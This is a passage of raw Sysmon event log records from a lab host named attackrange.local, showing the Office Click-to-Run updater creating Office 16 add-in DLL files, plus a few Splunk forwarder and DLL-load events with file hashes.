Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONGRAPHICS.DLL2021-04-20 14:54:10.378 11241100x800000000000000064261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power Map Excel Add-in\WPFEXTENSIONS.DLL2021-04-20 14:54:10.362 11241100x800000000000000064260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.PowerBI.AdomdClient.dll2021-04-20 14:54:10.362 11241100x800000000000000064259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.PowerBI.AdomdDataExtension.dll2021-04-20 14:54:10.362 11241100x800000000000000064258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.PowerBI.Diagnostics.dll2021-04-20 14:54:10.362 11241100x800000000000000064257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.Reporting.Common.dll2021-04-20 14:54:10.346 11241100x800000000000000064256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll2021-04-20 14:54:10.346 11241100x800000000000000064255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.AdHoc.Excel.Client.dll2021-04-20 14:54:10.346 11241100x800000000000000064254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.Authorization.dll2021-04-20 14:54:10.346 11241100x800000000000000064253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.Interfaces.dll2021-04-20 14:54:10.346 11241100x800000000000000064252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.346{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.ReportingServices.ProgressiveProcessing.dll2021-04-20 14:54:10.346 11241100x800000000000000064251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Interop.MSDASC.dll2021-04-20 14:54:10.300 11241100x800000000000000064250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Common.Wizard.dll2021-04-20 14:54:10.300 11241100x800000000000000064249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Common.dll2021-04-20 14:54:10.300 11241100x800000000000000064248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.BackEnd.XmlSerializers.dll2021-04-20 14:54:10.300 11241100x800000000000000064247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.BackEnd.dll2021-04-20 14:54:10.300 11241100x800000000000000064246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.Common.FrontEnd.XmlSerializers.dll2021-04-20 14:54:10.284 11241100x800000000000000064245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:10.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AugLoop\third-party-notices.txt2021-04-20 14:54:10.284 11241100x800000000000000064244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Excel.Common.FrontEnd.dll2021-04-20 14:54:10.268 11241100x800000000000000064243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Appshapi.dll2021-04-20 14:54:10.268 11241100x800000000000000064242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\appshvw.dll2021-04-20 14:54:10.268 11241100x800000000000000064241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\msvcr120.dll2021-04-20 14:54:10.268 11241100x800000000000000064240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\msvcp120.dll2021-04-20 14:54:10.268 11241100x800000000000000064239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Office.Interop.Excel.dll2021-04-20 14:54:10.268 11241100x800000000000000064238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.ScriptDom.dll2021-04-20 14:54:10.268 11241100x800000000000000064237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.Layout.dll2021-04-20 14:54:10.253 11241100x800000000000000064236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.DataWarehouse.DLL2021-04-20 14:54:10.253 11241100x800000000000000064235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.XLHost.Modeler.dll2021-04-20 14:54:10.253 11241100x800000000000000064234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Common.dll2021-04-20 14:54:10.253 11241100x800000000000000064233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.ConnectionUI.Dialog.dll2021-04-20 14:54:10.221 11241100x800000000000000064232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Dallas.OAuthClient.dll2021-04-20 14:54:10.221 11241100x800000000000000064231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Client.Picasso.dll2021-04-20 14:54:10.221 11241100x800000000000000064230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.SPClient.Interfaces.DLL2021-04-20 14:54:10.221 11241100x800000000000000064229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll2021-04-20 14:54:10.221 11241100x800000000000000064228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Client.Core.dll2021-04-20 14:54:10.221 11241100x800000000000000064227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.ConnectionUI.dll2021-04-20 14:54:10.221 11241100x800000000000000064226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.MDXQueryGenerator.dll2021-04-20 14:54:10.206 11241100x800000000000000064225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.AnalysisServices.AdomdClientUI.dll2021-04-20 14:54:10.206 11241100x800000000000000064224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.DataWarehouse.Interfaces.DLL2021-04-20 14:54:10.206 11241100x800000000000000064223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.DataWarehouse.dll2021-04-20 14:54:10.206 11241100x800000000000000064222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.ReportingServices.DataExtensions.dll2021-04-20 14:54:10.190 11241100x800000000000000064221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.ReportingServices.QueryDesigners.Extensions.dll2021-04-20 14:54:10.190 23542300x800000000000000064220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:10.190{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF87C9DC0C0B70F4FAC8308A45077665,SHA256=961B691CB4DE7561E6D13D8FBA2131A5F94411D0B6621CC74ECAB714879EDA8C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Excel.ReportingServices.QueryDesigners.dll2021-04-20 14:54:10.175 11241100x800000000000000064218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Office.PowerPivot.ExcelAddIn.dll2021-04-20 14:54:10.175 11241100x800000000000000064217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportViewer.Common.dll2021-04-20 14:54:10.112 11241100x800000000000000064216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONLNTCOMLIB.DLL2021-04-20 14:54:10.112 11241100x800000000000000064215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONFILTER.DLL2021-04-20 14:54:10.112 11241100x800000000000000064214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnIELinkedNotes.dll2021-04-20 14:54:10.112 11241100x800000000000000064213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnIE.dll2021-04-20 14:54:10.112 11241100x800000000000000064212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OLCFG.EXE2021-04-20 14:54:10.112 11241100x800000000000000064211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMSXP32.DLL2021-04-20 14:54:10.112 11241100x800000000000000064210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OMSMAIN.DLL2021-04-20 14:54:10.112 11241100x800000000000000064209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.Diagnostics.dll2021-04-20 14:54:10.112 11241100x800000000000000064208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportViewer.WinForms.dll2021-04-20 14:54:10.112 11241100x800000000000000064207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\zlibwapi.dll2021-04-20 14:54:10.112 11241100x800000000000000064206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll2021-04-20 14:54:10.112 11241100x800000000000000064205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.112{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\zlibwapi.dll2021-04-20 14:54:10.112 734700x800000000000000064204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:10.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3,IMPHASH=481A52B415277FC8692C7D6D9EA3475CtrueMicrosoft WindowsValid 11241100x800000000000000064203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:10.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common 